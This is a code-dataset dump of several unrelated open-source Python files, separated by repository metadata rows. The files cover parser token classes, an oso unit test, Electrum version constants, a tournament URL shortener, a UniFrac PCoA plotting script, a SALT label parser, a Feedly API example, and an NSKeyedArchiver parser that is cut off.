assert frill.comment is 0
return t.conjure_call(
conjure_commented_vw_frill(comment, frill.v, frill.w),
t.left,
t.arguments,
)
def count_newlines(t):
return t.frill.count_newlines() + t.left.count_newlines() + t.arguments.count_newlines()
def find_require_gem(t, e):
if not t.left.is_name('require_gem'):
return
assert t.arguments.is_arguments_1
e.add_require_gem(t.arguments.a)
@property
def indentation(t):
return t.frill.v
def display_token(t):
frill = t.frill
comment = frill.comment
return arrange('<%s +%d%s %s %s %s>',
t.display_name,
frill.v.total,
('' if comment is 0 else '' + comment.display_token()),
t.left .display_token(),
t.arguments.display_token(),
frill.w .display_token())
def dump_token(t, f, newline = true):
frill = t.frill
comment = frill.comment
if comment is 0:
f.partial('<%s +%d ', t.display_name, frill.v.total)
t .left .dump_token(f)
t .arguments.dump_token(f)
r = frill.w .dump_token(f, false)
return f.token_result(r, newline)
with f.indent(arrange('<%s +%d', t.display_name, frill.v.total), '>'):
comment .dump_token(f)
t.left .dump_token(f)
t.arguments.dump_token(f)
frill.w .dump_token(f)
order = order__frill_ab
def scout_variables(t, art):
t.left .scout_variables(art)
t.arguments.scout_variables(art)
def write(t, w):
frill = t.frill
comment = frill.comment
if comment is not 0:
comment.write(w)
w(frill.v.s)
t.left .write(w)
t.arguments.write(w)
w(frill.w.s)
CallStatementBase.a = CallStatementBase.left
CallStatementBase.b = CallStatementBase.arguments
CallStatementBase.k1 = CallStatementBase.frill
CallStatementBase.k2 = CallStatementBase.left
CallStatementBase.k3 = CallStatementBase.arguments
@share
class CallStatement(CallStatementBase):
__slots__ = (())
display_name = 'call-statement'
@share
class MethodCallStatement(CallStatementBase):
__slots__ = (())
display_name = 'method-call-statement'
def produce_conjure_call_statement(name, meta):
cache = create_cache(name, conjure_nub)
return produce_conjure_unique_triple__312(name, meta, cache)
conjure_call_statement = produce_conjure_call_statement('call-statement', CallStatement)
conjure_method_call_statement = produce_conjure_call_statement('method-call-statement', MethodCallStatement)
static_conjure_call_statement = static_method(conjure_call_statement)
static_conjure_method_call_statement = static_method(conjure_method_call_statement)
MemberExpression.call_statement = static_conjure_method_call_statement
PearlToken .call_statement = static_conjure_call_statement
SapphireTrunk .call_statement = static_conjure_call_statement
CallStatement .conjure_call = static_conjure_call_statement
MethodCallStatement.conjure_call = static_conjure_method_call_statement
CallStatement.transform = produce_transform__frill__ab_with_priority(
'call_statement',
PRIORITY_POSTFIX,
PRIORITY_COMPREHENSION,
conjure_call_statement,
)
MethodCallStatement.transform = produce_transform__frill__ab_with_priority(
'method_call_statement',
PRIORITY_POSTFIX,
PRIORITY_COMPREHENSION,
conjure_method_call_statement,
)
| 31.533708
| 112
| 0.549973
| 3,411
| 0.607696
| 0
| 0
| 5,545
| 0.987885
| 0
| 0
| 453
| 0.080706
|
bb75831e0db77f35e095a17d5451a6e61a18c00c
| 546
|
py
|
Python
|
languages/python/sqlalchemy-oso/tests/test_partial.py
|
johnhalbert/oso
|
3185cf3740b74c3c1deaca5b9ec738325de4c8a2
|
[
"Apache-2.0"
] | null | null | null |
languages/python/sqlalchemy-oso/tests/test_partial.py
|
johnhalbert/oso
|
3185cf3740b74c3c1deaca5b9ec738325de4c8a2
|
[
"Apache-2.0"
] | null | null | null |
languages/python/sqlalchemy-oso/tests/test_partial.py
|
johnhalbert/oso
|
3185cf3740b74c3c1deaca5b9ec738325de4c8a2
|
[
"Apache-2.0"
] | null | null | null |
"""Unit tests for partial implementation."""
from polar.expression import Expression
from polar.variable import Variable
from sqlalchemy_oso.partial import dot_op_path
def test_dot_op_path():
single = Expression("Dot", [Variable("_this"), "created_by"])
assert dot_op_path(single) == ["created_by"]
double = Expression("Dot", [single, "username"])
assert dot_op_path(double) == ["created_by", "username"]
triple = Expression("Dot", [double, "first"])
assert dot_op_path(triple) == ["created_by", "username", "first"]
| 32.117647
| 69
| 0.705128
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 158
| 0.289377
|
bb75907adc83d289e117c742bd2e7ed7ea682464
| 426
|
py
|
Python
|
lib/version.py
|
Durendal/electrum-rby
|
0dadd13467d44bcc7128f0dec0fa1aeff8d22576
|
[
"MIT"
] | null | null | null |
lib/version.py
|
Durendal/electrum-rby
|
0dadd13467d44bcc7128f0dec0fa1aeff8d22576
|
[
"MIT"
] | 1
|
2021-11-15T17:47:29.000Z
|
2021-11-15T17:47:29.000Z
|
lib/version.py
|
Durendal/electrum-rby
|
0dadd13467d44bcc7128f0dec0fa1aeff8d22576
|
[
"MIT"
] | 1
|
2017-11-13T23:19:46.000Z
|
2017-11-13T23:19:46.000Z
|
ELECTRUM_VERSION = '3.0' # version of the client package
PROTOCOL_VERSION = '0.10' # protocol version requested
# The hash of the mnemonic seed must begin with this
SEED_PREFIX = '01' # Standard wallet
SEED_PREFIX_2FA = '101' # Two-factor authentication
def seed_prefix(seed_type):
if seed_type == 'standard':
return SEED_PREFIX
elif seed_type == '2fa':
return SEED_PREFIX_2FA
| 32.769231
| 60
| 0.683099
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 190
| 0.446009
|
bb75ca51f4748a57620c013b53d94680ace60cc1
| 1,579
|
py
|
Python
|
src/url.py
|
nahueldebellis/TwitchTournamentGenerator
|
a0a203e08d836ad744850839385324c54314b8a4
|
[
"MIT"
] | null | null | null |
src/url.py
|
nahueldebellis/TwitchTournamentGenerator
|
a0a203e08d836ad744850839385324c54314b8a4
|
[
"MIT"
] | null | null | null |
src/url.py
|
nahueldebellis/TwitchTournamentGenerator
|
a0a203e08d836ad744850839385324c54314b8a4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from pyshorteners import Shortener
"""Url class"""
class Url():
"""This class format participants and add to an url and short the url"""
cant_participants = 0
bracket = 0
def __init__(self):
self.short_url = Shortener()
self.url_final = ['https://scorecounter.com/tournament/?set=', '51001111000000']
self.concat = '&'
self.treintaydos = '5'
self.dieciseis = '4'
self.ocho = '3'
def add(self, participant):
"""add new pasticipant to the bracket"""
Url.bracket = Url.bracket if Url.cant_participants % 2 else Url.bracket+1
Url.cant_participants = Url.cant_participants+1
position = 'home' if Url.cant_participants % 2 else 'visitor'
self.url_final.append(f'{self.concat}{position}1-{Url.bracket}={participant}')
def show(self):
"""concat the url and return the string of shorter url"""
if Url.cant_participants <= 32:
self.url_final[1] = self.treintaydos+self.url_final[1][1:]
if Url.cant_participants <= 16:
self.url_final[1] = self.dieciseis+self.url_final[1][1:]
if Url.cant_participants <= 8:
self.url_final[1] = self.ocho+self.url_final[1][1:]
Url.cant_participants = 0
Url.bracket = 0
self.format_url_spaces()
print(self.url_final)
return self.short_url.isgd.short(self.url_final)
def format_url_spaces(self):
"""replace space with %20 in the url"""
self.url_final = ''.join(self.url_final).replace(' ', '%20')
| 41.552632
| 88
| 0.627612
| 1,504
| 0.952502
| 0
| 0
| 0
| 0
| 0
| 0
| 395
| 0.250158
|
bb76a8caabf2f194e804291ce67ba419fda452c3
| 5,302
|
py
|
Python
|
UniPCoA.py
|
AdeBC/UniRPyCoA
|
f5b54297daf07856d9a88ebc8e6277e7be9b7ecc
|
[
"MIT"
] | null | null | null |
UniPCoA.py
|
AdeBC/UniRPyCoA
|
f5b54297daf07856d9a88ebc8e6277e7be9b7ecc
|
[
"MIT"
] | null | null | null |
UniPCoA.py
|
AdeBC/UniRPyCoA
|
f5b54297daf07856d9a88ebc8e6277e7be9b7ecc
|
[
"MIT"
] | null | null | null |
import os
import pandas as pd
from plotnine import *
import plotnine
from matplotlib import pyplot as plt
import matplotlib
from scipy.spatial.distance import pdist, squareform
from skbio.stats.ordination import pcoa
from skbio.diversity import beta_diversity
from skbio.io import read
from skbio.tree import TreeNode
import argparse
from scipy.spatial.distance import pdist, squareform
def loadTree(tree):
with open(tree, 'r') as f:
tree = read(f, format="newick", into=TreeNode)
return tree
if __name__ == '__main__':
matplotlib.rcParams['pdf.fonttype'] = 42
matplotlib.rcParams['ps.fonttype'] = 42
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--abundance', type=str, default='species_abundance.csv', help='The input abundance data, columns represent samples and rows represent taxa.')
parser.add_argument('-m', '--metadata', type=str, default='metadata.csv', help='The input metadata, use column "Env" to specify the group of the input samples.')
parser.add_argument('-o', '--output', type=str, default='PLots.Unifrac', help='The folder to save output table and plots.')
parser.add_argument('-t', '--tree', type=str, default='LTPs132_SSU_tree.newick', help='The input phylogenetic tree, in Newick format.')
parser.add_argument('--metric', type=str, default='weighted_unifrac', help='The metric for beta_diversity calculation.')
args = parser.parse_args()
print('Loading data...')
X = pd.read_csv(args.abundance, index_col=0).T
Y = pd.read_csv(args.metadata).set_index('SampleID')
use_phylogeny = args.metric in ['weighted_unifrac', 'unweighted_unifrac']
if use_phylogeny:
tree = loadTree(tree=args.tree)
print('Processing the phylogenetic tree...')
for n in tree.postorder():
if n.name != None and '_ ' in n.name:
n.name = n.name.split('_ ')[1]
names = [n.name for n in tree.postorder()]
print('Processing the abundance data...')
ids = X.index.tolist()
otu_ids = X.columns.tolist()
X = X.reset_index().melt(id_vars=['index'], value_vars=X.columns, var_name='taxonomy', value_name='abundance')
taxa = pd.DataFrame(X.taxonomy.apply(lambda x: dict(map(lambda y: y.split('__'), filter(lambda x: not x.endswith('__'), x.split(';'))))).tolist())
X = pd.concat([X.drop(columns=['taxonomy']), taxa], axis=1)
X = X.melt(id_vars=['index','abundance'], value_vars=taxa.columns, var_name='rank', value_name='taxonomy')
X = X.groupby(by=['index', 'taxonomy'], as_index=False).sum().pivot_table(columns='taxonomy', index='index', values='abundance')
if use_phylogeny:
X = X.loc[:, X.columns.to_series().isin(names)]
ids = X.index.tolist()
otu_ids = X.columns.tolist()
try:
print('Trying calculating {} beta_diversity using scikit-bio & scikit-learn package...'.format(args.metric))
print('This could be time-consuming.')
if use_phylogeny:
mat = beta_diversity(args.metric, X, ids, tree=tree, otu_ids=otu_ids, validate=False).data
else:
mat = beta_diversity(args.metric, X, ids, otu_ids=otu_ids, validate=False).data
except ValueError:
print('Failed, the metric you selected is not supported by neither scikit-bio nor scikit-learn.')
print('Trying using SciPy...')
mat = squareform(pdist(X, metric=args.metric))
print('Succeeded!')
pcs = pd.DataFrame(pcoa(mat, number_of_dimensions=2).samples.values.tolist(), index=X.index, columns=['PC1', 'PC2'])
pcs = pd.concat([pcs, Y], axis=1)
print('Visualizing the data using plotnine package...')
p = (ggplot(pcs, aes(x='PC1', y='PC2', color='Env'))
+ geom_point(size=0.2)
+ scale_color_manual(['#E64B35FF','#4DBBD5FF','#00A087FF','#3C5488FF','#F39B7FFF','#8491B4FF','#91D1C2FF'])
+ theme(panel_grid_major = element_blank(), panel_grid_minor = element_blank(), panel_background = element_blank())
+ theme(axis_line = element_line(color="gray", size = 1))
+ stat_ellipse()
+ xlab('PC1')
+ ylab('PC2')
)
box_1 = (ggplot(pcs, aes(x='Env', y='PC1', color='Env'))
+ geom_boxplot(width=0.3, show_legend=False)
+ scale_color_manual(['#E64B35FF','#4DBBD5FF','#00A087FF','#3C5488FF','#F39B7FFF','#8491B4FF','#91D1C2FF'])
+ theme(figure_size=[4.8, 1])
+ theme(panel_grid_major = element_blank(), panel_grid_minor = element_blank(), panel_background = element_blank())
+ theme(axis_line = element_line(color="gray", size = 1))
+ xlab('Env')
+ ylab('PC1')
+ coord_flip()
)
box_2 = (ggplot(pcs, aes(x='Env', y='PC2', color='Env'))
+ geom_boxplot(width=0.3, show_legend=False)
+ scale_color_manual(['#E64B35FF','#4DBBD5FF','#00A087FF','#3C5488FF','#F39B7FFF','#8491B4FF','#91D1C2FF'])
+ theme(figure_size=[4.8, 1])
+ theme(panel_grid_major = element_blank(), panel_grid_minor = element_blank(), panel_background = element_blank())
+ theme(axis_line = element_line(color="gray", size = 1))
+ xlab('Env')
+ ylab('PC2')
+ coord_flip()
)
if not os.path.isdir(args.output):
os.mkdir(args.output)
p.save(os.path.join(args.output, 'PCoA.pdf'), width=4.8, height=4.8)
box_1.save(os.path.join(args.output, 'PC1_boxplot.pdf'), width=4.8, height=1)
box_2.save(os.path.join(args.output, 'PC2_boxplot.pdf'), width=4.8, height=1)
pcs.to_csv(os.path.join(args.output, 'Principle_coordinations.csv'))
print('Plots are saved in {}. Import them into Illustrator for further improvements.'.format(args.output))
| 49.092593
| 169
| 0.704828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,550
| 0.292343
|
bb77128dc910f27388f4e518fef5f850a41210e0
| 357
|
py
|
Python
|
web/impact/impact/graphql/types/location_type.py
|
masschallenge/impact-api
|
81075ced8fcc95de9390dd83c15e523e67fc48c0
|
[
"MIT"
] | 5
|
2017-10-19T15:11:52.000Z
|
2020-03-08T07:16:21.000Z
|
web/impact/impact/graphql/types/location_type.py
|
masschallenge/impact-api
|
81075ced8fcc95de9390dd83c15e523e67fc48c0
|
[
"MIT"
] | 182
|
2017-06-21T19:32:13.000Z
|
2021-03-22T13:38:16.000Z
|
web/impact/impact/graphql/types/location_type.py
|
masschallenge/impact-api
|
81075ced8fcc95de9390dd83c15e523e67fc48c0
|
[
"MIT"
] | 1
|
2018-06-23T11:53:18.000Z
|
2018-06-23T11:53:18.000Z
|
from graphene_django import DjangoObjectType
from accelerator.models import Location
class LocationType(DjangoObjectType):
class Meta:
model = Location
only_fields = (
'street_address',
'timezone',
'country',
'state',
'name',
'city',
'id'
)
| 18.789474
| 44
| 0.521008
| 267
| 0.747899
| 0
| 0
| 0
| 0
| 0
| 0
| 58
| 0.162465
|
bb7baf8c8805cb067d4cf73845cfee7e1f0d116f
| 2,835
|
py
|
Python
|
invoice/spy/notify_osd.py
|
simone-campagna/invoice
|
6446cf6ebb158b895cd11d707eb019ae23833881
|
[
"Apache-2.0"
] | null | null | null |
invoice/spy/notify_osd.py
|
simone-campagna/invoice
|
6446cf6ebb158b895cd11d707eb019ae23833881
|
[
"Apache-2.0"
] | 16
|
2015-01-30T16:28:54.000Z
|
2015-03-02T14:18:56.000Z
|
invoice/spy/notify_osd.py
|
simone-campagna/invoice
|
6446cf6ebb158b895cd11d707eb019ae23833881
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright 2015 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
__author__ = "Simone Campagna"
__all__ = [
'available'
'notify',
]
import os
try: # pragma: no cover
import notify2
HAS_NOTIFY2 = True
except ImportError:
HAS_NOTIFY2 = False
from . import text_formatter
_NOTIFICATION = None
def available(): # pragma: no cover
return HAS_NOTIFY2
_PACKAGE_DIR = os.path.dirname(__file__)
_ICONS = {
'info': os.path.join(_PACKAGE_DIR, 'icons', 'logo_info.jpg'),
'warning': os.path.join(_PACKAGE_DIR, 'icons', 'logo_warning.jpg'),
'error': os.path.join(_PACKAGE_DIR, 'icons', 'logo_error.jpg'),
}
if HAS_NOTIFY2: # pragma: no cover
def notify(logger, validation_result, scan_events, updated_invoice_collection, event_queue, spy_notify_level):
notification_required, kind, title, text, detailed_text = text_formatter.formatter(
validation_result=validation_result,
scan_events=scan_events,
updated_invoice_collection=updated_invoice_collection,
event_queue=event_queue,
mode=text_formatter.MODE_SHORT,
spy_notify_level=spy_notify_level,
)
if notification_required:
global _NOTIFICATION
summary = title + ' [{}]'.format(kind.upper())
message = text
if detailed_text:
message += '\n\n' + detailed_text
icon = _ICONS[kind]
if _NOTIFICATION is None:
notify2.init("Invoice spy [{}]".format(kind.upper()))
_NOTIFICATION = notify2.Notification(summary=summary, message=message, icon=icon)
notification = _NOTIFICATION
urgency_d = {
'info': notify2.URGENCY_LOW,
'warning': notify2.URGENCY_NORMAL,
'error': notify2.URGENCY_CRITICAL,
}
notification.update(summary=summary, message=message, icon=icon)
notification.set_urgency(urgency_d[kind])
#if notify_pyqt4.available():
# callback = lambda : notify_pyqt4.notify(logger, kind, title, text, detailed_text)
# notification.add_action("fai qualcosa", "qualcosa", callback, user_data=None)
notification.show()
else:
notify = None
| 35
| 114
| 0.65679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,023
| 0.360847
|
bb7bc4b7cb8f753fbf39ae6cb16944a05b0ab207
| 3,878
|
py
|
Python
|
src/discoursegraphs/readwrite/salt/labels.py
|
arne-cl/discoursegraphs
|
4e14688e19c980ac9bbac75ff1bf5d751ef44ac3
|
[
"BSD-3-Clause"
] | 41
|
2015-02-20T00:35:39.000Z
|
2022-03-15T13:54:13.000Z
|
src/discoursegraphs/readwrite/salt/labels.py
|
arne-cl/discoursegraphs
|
4e14688e19c980ac9bbac75ff1bf5d751ef44ac3
|
[
"BSD-3-Clause"
] | 68
|
2015-01-09T18:07:38.000Z
|
2021-10-06T16:30:43.000Z
|
src/discoursegraphs/readwrite/salt/labels.py
|
arne-cl/discoursegraphs
|
4e14688e19c980ac9bbac75ff1bf5d751ef44ac3
|
[
"BSD-3-Clause"
] | 8
|
2015-02-20T00:35:48.000Z
|
2021-10-30T14:09:03.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This module handles the parsing of SALT labels.
There are three types of labels (SFeature, SElementId, SAnnotation).
Labels can occur as children of these elements: 'layers', 'nodes', 'edges'
and '{sDocumentStructure}SDocumentGraph'.
"""
from lxml.builder import ElementMaker
from discoursegraphs.readwrite.salt.util import (get_xsi_type, string2xmihex,
NAMESPACES)
XSI = "http://www.w3.org/2001/XMLSchema-instance"
class SaltLabel(object):
"""
Two or more ``SaltLabel``s are attached to each element in a SaltXMI
file: one label representing the name (``SNAME``) of the element, one
representing its ID and one label for each kind of annotation associated
with that element.
"""
def __init__(self, name, value, xsi_type, namespace=None, hexvalue=None):
"""
create a SaltLabel from scratch.
Parameters
----------
name : str
the name of the label, e.g. ``SNAME`` or ``id``
namespace : str or None
the namespace of the label, e.g. ``salt`` or ``graph``
value : str
the actual label value, e.g. ``sSpan19`` or ``NP``
hexvalue: str or None
a weird hex-based representation of the value, which always starts
with ``ACED00057``. If it is not set, we can automatically generate
it, but we can't guarantee that it matches the value SaltNPepper
would have generated.
xsi_type : str
the type of the label, e.g. ``saltCore:SFeature`` or
``saltCore:SAnnotation``
"""
self.xsi_type = xsi_type
self.namespace = namespace if namespace else None
self.name = name
self.value = value
self.hexvalue = hexvalue if hexvalue else string2xmihex(value)
@classmethod
def from_etree(cls, etree_element):
"""
creates a ``SaltLabel`` from an etree element representing a label
element in a SaltXMI file.
A label element in SaltXMI looks like this::
<labels xsi:type="saltCore:SFeature" namespace="salt"
name="SNAME" value="ACED0005740007735370616E3139"
valueString="sSpan19"/>
Parameters
----------
etree_element : lxml.etree._Element
an etree element parsed from a SaltXMI document
"""
return cls(name=etree_element.attrib['name'],
value=etree_element.attrib['valueString'],
xsi_type=get_xsi_type(etree_element),
namespace=etree_element.attrib.get('namespace'),
hexvalue=etree_element.attrib['value'])
def to_etree(self):
"""
creates an etree element of a ``SaltLabel`` that mimicks a SaltXMI
<labels> element
"""
attribs = {
'{{{pre}}}type'.format(pre=NAMESPACES['xsi']): self.xsi_type,
'namespace': self.namespace, 'name': self.name,
'value': self.hexvalue, 'valueString': self.value}
non_empty_attribs = {key: val for (key, val) in attribs.items()
if val is not None}
E = ElementMaker()
return E('labels', non_empty_attribs)
def get_namespace(label):
"""
returns the namespace of an etree element or None, if the element
doesn't have that attribute.
"""
if 'namespace' in label.attrib:
return label.attrib['namespace']
else:
return None
def get_annotation(label):
"""
returns an annotation (key, value) tuple given an etree element
(with tag 'labels' and xsi type 'SAnnotation'), e.g. ('tiger.pos', 'ART')
"""
assert get_xsi_type(label) == 'saltCore:SAnnotation'
return (label.attrib['name'], label.attrib['valueString'])
| 35.577982
| 79
| 0.60624
| 2,791
| 0.719701
| 0
| 0
| 856
| 0.220732
| 0
| 0
| 2,414
| 0.622486
|
bb7c19c39a756e836f832fe37756f912b98af313
| 1,214
|
py
|
Python
|
examples/stream_entries.py
|
feedly/python-api-client
|
a211734a77337145efa0d1a1ddfe484f74530998
|
[
"MIT"
] | 31
|
2018-08-20T08:35:09.000Z
|
2022-03-21T04:17:27.000Z
|
examples/stream_entries.py
|
feedly/python-api-client
|
a211734a77337145efa0d1a1ddfe484f74530998
|
[
"MIT"
] | 8
|
2018-10-17T18:09:44.000Z
|
2021-12-14T10:03:34.000Z
|
examples/stream_entries.py
|
feedly/python-api-client
|
a211734a77337145efa0d1a1ddfe484f74530998
|
[
"MIT"
] | 7
|
2018-09-04T01:10:48.000Z
|
2021-08-19T11:07:54.000Z
|
from feedly.api_client.session import FeedlySession
from feedly.api_client.stream import StreamOptions
from feedly.api_client.utils import run_example
def example_stream_entries():
"""
This example will prompt you to enter a category name, download the 10 latest articles from it, and display their
titles.
"""
# Prompt for the category name/id to use
user_category_name_or_id = input("> User category name or id: ")
# Create the session using the default auth directory
session = FeedlySession()
# Fetch the category by its name/id
# To use an enterprise category, change to `session.user.enterprise_categories`. Tags are also supported.
category = session.user.user_categories.get(user_category_name_or_id)
# Stream 10 articles with their contents from the category
for article in category.stream_contents(options=StreamOptions(max_count=10)):
# Print the title of each article
print(article["title"])
if __name__ == "__main__":
# Will prompt for the token if missing, and launch the example above
# If a token expired error is raised, will prompt for a new token and restart the example
run_example(example_stream_entries)
| 39.16129
| 117
| 0.74547
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 670
| 0.551895
|
bb809b94005596a2a1d4a23ab288a44cc7045e25
| 141
|
py
|
Python
|
program5.py
|
kashifrepo/Python-Saylani
|
1ac9fe05012ad716d4ef30d771d9828f91221ac6
|
[
"Apache-2.0"
] | null | null | null |
program5.py
|
kashifrepo/Python-Saylani
|
1ac9fe05012ad716d4ef30d771d9828f91221ac6
|
[
"Apache-2.0"
] | null | null | null |
program5.py
|
kashifrepo/Python-Saylani
|
1ac9fe05012ad716d4ef30d771d9828f91221ac6
|
[
"Apache-2.0"
] | null | null | null |
# Program no 5
1stname = input(" Enter 1st name ")
lastname = input(" Enter last name ")
print 1stname[::-1]
print lastname[::-1]
| 20.142857
| 38
| 0.617021
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 52
| 0.368794
|
bb835887638d97fd49e95038db89b9f00019f7b3
| 1,343
|
py
|
Python
|
setup.py
|
wo0dyn/django-basic-models-behaviors
|
19bbd09630c38451c89f32d38023053b23995db9
|
[
"BSD-3-Clause"
] | 2
|
2016-07-14T00:29:59.000Z
|
2016-07-18T02:55:35.000Z
|
setup.py
|
wo0dyn/django-basic-models-behaviors
|
19bbd09630c38451c89f32d38023053b23995db9
|
[
"BSD-3-Clause"
] | 5
|
2015-07-02T07:42:10.000Z
|
2020-06-05T16:54:04.000Z
|
setup.py
|
wo0dyn/django-basic-models-behaviors
|
19bbd09630c38451c89f32d38023053b23995db9
|
[
"BSD-3-Clause"
] | 1
|
2015-10-20T10:11:35.000Z
|
2015-10-20T10:11:35.000Z
|
# -*- coding: utf-8 -*-
import codecs
import os
from setuptools import setup
def read(*parts):
return codecs.open(os.path.join(os.path.dirname(__file__), *parts), encoding='utf-8').read()
setup(
name='django-basic-models-behaviors',
version=__import__('basic_models_behaviors').__version__,
description='Tiny app to provide basic behaviors for django models.',
long_description=read('README.rst'),
author='Nicolas Dubois',
author_email='nicolas.c.dubois@gmail.com',
url='https://github.com/wo0dyn/django-basic-models-behaviors',
keywords="django",
packages=['basic_models_behaviors'],
include_package_data=True,
zip_safe=False,
license='MIT License',
platforms=['any'],
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Framework :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
]
)
| 31.97619
| 96
| 0.638124
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 760
| 0.565897
|
bb84b60c8bd64fa0c7fda5ba539335cf5ce1fc5a
| 10,746
|
py
|
Python
|
plistutils/nskeyedarchiver.py
|
sathwikv143/plistutils
|
fc7783449da1ed222547ceb5c416402216fa9b34
|
[
"BSD-3-Clause"
] | 35
|
2017-10-17T17:24:16.000Z
|
2022-03-18T22:10:47.000Z
|
plistutils/nskeyedarchiver.py
|
sathwikv143/plistutils
|
fc7783449da1ed222547ceb5c416402216fa9b34
|
[
"BSD-3-Clause"
] | 1
|
2021-07-09T01:06:30.000Z
|
2021-07-09T01:06:30.000Z
|
plistutils/nskeyedarchiver.py
|
sathwikv143/plistutils
|
fc7783449da1ed222547ceb5c416402216fa9b34
|
[
"BSD-3-Clause"
] | 4
|
2018-11-17T15:52:36.000Z
|
2022-02-28T08:01:14.000Z
|
import logging
from uuid import UUID
from biplist import Data, Uid
from plistutils.utils import parse_mac_absolute_time
logger = logging.getLogger(__name__)
class NSKeyedArchiveException(Exception):
pass
class NSKeyedArchiveParser(object):
# https://developer.apple.com/documentation/foundation/nskeyedarchiver
KNOWN_VERSIONS = [100000]
def __init__(self, fullpath):
self.fullpath = fullpath
@staticmethod
def is_known_nskeyedarchive(plist_data, fullpath):
if plist_data:
archiver = plist_data.get('$archiver')
version = plist_data.get('$version')
# NR -> iOS NanoRegistry KeyedArchiver (inherits from NSKeyedArchiver)
if archiver in ['NRKeyedArchiver', 'NSKeyedArchiver']:
if version in NSKeyedArchiveParser.KNOWN_VERSIONS:
return True
else:
logger.error("Unknown NSKeyedArchiver version '{}' in file {}, please report.", version, fullpath)
return False
def parse_archive(self, plist_data):
"""
:param plist_data: pre-parsed plist data
:return: parsed dict
"""
ret = {}
objects_list = plist_data.get('$objects')
if objects_list:
for name, val in plist_data.get('$top', {}).items():
if isinstance(val, Uid):
top = objects_list[val.integer]
try:
ret[name] = self.process_obj(top, objects_list)
except RecursionError:
# failsafe
logger.error(
"Could not parse NSKeyedArchive '{}' in top key '{}' due to infinite recursion",
self.fullpath, name)
else:
ret[name] = val
return ret
def process_obj(self, obj, objects_list, parents=None):
if parents is None:
parents = set()
obj_id = id(obj)
if obj_id in parents:
raise NSKeyedArchiveException("Infinite loop detected while parsing NSKeyedArchive data in '{}'".format(self.fullpath))
else:
parents.add(obj_id)
ret = obj
if isinstance(obj, dict):
ret = self.convert_dict(obj, objects_list, parents)
elif isinstance(obj, list):
ret = [self.process_obj(x, objects_list, parents) for x in obj]
elif isinstance(obj, Uid):
ret = self.process_obj(objects_list[obj.integer], objects_list, parents)
elif isinstance(obj, (bool, bytes, int, float)) or obj is None:
ret = obj
elif isinstance(obj, str):
ret = self.convert_string(obj)
elif isinstance(obj, Data):
ret = bytes(obj)
else:
logger.warning("Unexpected data type '{}' in '{}', please report.", type(obj).__name__, self.fullpath)
parents.remove(obj_id)
return ret
def _process_ns_dictionary(self, _class_name, d, objects_list, parents):
if 'NS.keys' in d and 'NS.objects' in d:
assembled_dict = {}
for idx, k in enumerate(d['NS.keys']):
assembled_dict[self.process_obj(k, objects_list, parents)] = self.process_obj(d['NS.objects'][idx],
objects_list, parents)
return assembled_dict
return d
def _process_ns_url(self, _class_name, d, objects_list, parents):
base = self.process_obj(d.get('NS.base', ''), objects_list, parents)
relative = self.process_obj(d.get('NS.relative', ''), objects_list, parents)
return '/'.join([x for x in [base, relative] if x])
def _process_ns_uuid(self, _class_name, d, _objects_list, _parents):
uuid_bytes = d.get('NS.uuidbytes', '')
if len(uuid_bytes) == 16:
return str(UUID(bytes=uuid_bytes))
return uuid_bytes
def _process_ns_sequence(self, _class_name, d, objects_list, parents):
array_members = d.get('NS.objects')
return [self.process_obj(member, objects_list, parents) for member in array_members]
def _process_ns_data(self, _class_name, d, _objects_list, _parents):
data = d.get('NS.data', None)
if isinstance(data, dict) and self.is_known_nskeyedarchive(data, ''):
return self.parse_archive(data)
return data
def _process_ns_null(self, _class_name, d, _objects_list, _parents):
return None
def _process_ns_string(self, _class_name, d, _objects_list, _parents):
return d.get('NS.string', None)
def _process_ns_attributed_string(self, class_name, d, objects_list, parents):
# Sample:
# {'NSAttributeInfo': Uid(74), '$class': Uid(51), 'NSString': Uid(68), 'NSAttributes': Uid(69)}
# TODO if demand - process NSAttributes, NSAttributeInfo (font, color, style, etc)
return self.process_obj(d.get('NSString'), objects_list, parents)
def _process_ns_range(self, _class_name, d, objects_list, parents):
# length: The number of items in the range (can be 0). LONG_MAX is the maximum value you should use for length.
# location: The start index (0 is the first). LONG_MAX is the maximum value you should use for location.
#
return {
'length': self.process_obj(d.get('NS.rangeval.length'), objects_list, parents),
'location': self.process_obj(d.get('NS.rangeval.location'), objects_list, parents)
}
def _process_ns_value(self, class_name, d, objects_list, parents):
# An NSValue object can hold any of the scalar types such as int, float, and char,
# as well as pointers, structures, and object id references.
#
# NS.special: 1 : NSPoint, 2 : NSSize, 3 : NSRect, 4 : NSRange, 12 : NSEdgeInsets
#
# NSConcreteValue varies based on type, which is typically provided by the @encode compiler directive
# https://developer.apple.com/library/content/documentation/Cocoa/Conceptual/ObjCRuntimeGuide/Articles/ocrtTypeEncodings.html#//apple_ref/doc/uid/TP40008048-CH100
# These types are voluminous, and we need samples to support them.
# https://github.com/apple/swift-corelibs-foundation/blob/master/Foundation/NSSpecialValue.swift
ns_value_special_types = {
# 1: 'NSPoint'
# 2: 'NSSize'
# 3: 'NSRect' https://github.com/apple/swift-corelibs-foundation/blob/master/TestFoundation/Resources/NSKeyedUnarchiver-RectTest.plist
